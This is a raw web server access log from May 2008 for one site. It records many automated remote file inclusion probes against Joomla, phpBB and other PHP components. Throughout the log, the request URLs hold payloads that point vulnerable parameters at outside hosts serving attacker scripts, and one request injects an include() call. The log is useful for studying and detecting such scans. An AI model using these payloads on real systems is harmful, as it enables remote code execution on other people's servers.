69.90.72.88 - - [16/May/2008:11:49:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:11:49:16 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:49:19 -0700] "GET /logs/access_071130.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:49:35 -0700] "GET /logs/access_071120.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:49:37 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:49:38 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:49:38 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:49:48 -0700] "GET //SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:49:49 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:49:56 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:11:49:56 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:50:03 -0700] "GET /logs/access_080131.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:50:03 -0700] "GET /logs/access_071215.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:50:04 -0700] "GET /logs/access_080106.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:11:50:32 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:50:47 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:50:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:11:51:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:51:09 -0700] "GET /logs/access_071129.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:11:51:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:51:18 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:11:51:18 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:51:23 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:11:51:23 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:51:32 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:11:51:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:51:55 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.77.101 - - [16/May/2008:11:52:04 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
84.234.77.101 - - [16/May/2008:11:52:04 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:11:52:30 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:52:31 -0700] "GET /logs/access_071230.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.111.159 - - [16/May/2008:11:52:32 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:11:52:35 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:11:52:37 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:11:52:46 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:52:51 -0700] "GET /logs/access_080225.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:52:56 -0700] "GET /logs/access_071214.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:11:53:47 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:11:53:48 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:53:50 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:11:53:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:53:54 -0700] "GET /logs/index.php3?aide=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:53:55 -0700] "GET /index.php3?aide=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:53:59 -0700] "GET /logs/access_071126.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:54:14 -0700] "GET /logs/access_080211.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:54:28 -0700] "GET /logs//-+./index.php?=index=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
208.100.17.158 - - [16/May/2008:11:54:29 -0700] "GET //-+./index.php?=index=http://www12.asphost4free.com/redland/idi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:54:35 -0700] "GET /logs/access_080110.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:54:35 -0700] "GET /logs/access_071205.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:54:38 -0700] "GET /logs/access_080105.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:11:54:45 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:11:54:47 -0700] "GET /logs/access.log//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:11:54:47 -0700] "GET //SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:11:54:48 -0700] "GET /logs//SQuery/lib/doom3.php?libpath=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:11:55:28 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:11:55:29 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:11:56:14 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:56:18 -0700] "GET /logs/access_080201.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:11:56:23 -0700] "GET /logs/access_080111.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:56:34 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:56:40 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:56:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.38.4.3 - - [16/May/2008:11:56:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:11:56:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:11:56:46 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:11:56:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.84.34.22 - - [16/May/2008:11:56:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://owner.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:11:56:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
72.3.133.251 - - [16/May/2008:11:56:49 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:57:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:11:57:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:57:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:57:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:57:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.34.226.154 - - [16/May/2008:11:57:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:11:57:12 -0700] "GET //citywriter/head.php?path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:11:57:26 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:11:57:26 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:57:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:57:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.35.179 - - [16/May/2008:11:58:05 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:11:58:07 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.107.130.4 - - [16/May/2008:11:58:07 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:11:58:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:58:29 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:58:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:58:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:11:58:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.74.39 - - [16/May/2008:11:58:57 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:11:58:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
67.15.62.72 - - [16/May/2008:11:58:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:11:58:59 -0700] "GET /logs//module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.74.39 - - [16/May/2008:11:58:59 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:11:59:00 -0700] "GET //module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:11:59:11 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
213.203.223.45 - - [16/May/2008:11:59:11 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:59:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:11:59:15 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:59:30 -0700] "GET /logs/access_080214.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:59:35 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:11:59:36 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:12:00:08 -0700] "GET /logs//index.php?view=page&pagename=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.103.23.40 - - [16/May/2008:12:00:13 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://watchvitality.com/v1/sefe.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:12:00:21 -0700] "GET //index.php?view=page&pagename=http://fadhilla.net/test.txt? HTTP/1.1" 200 6209 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:12:00:38 -0700] "GET //ch_readalso.php?read_xml_include=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
209.62.80.134 - - [16/May/2008:12:00:38 -0700] "GET /logs//ch_readalso.php?read_xml_include=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:12:01:00 -0700] "GET /logs/access_080125.log//module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:12:01:01 -0700] "GET //module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
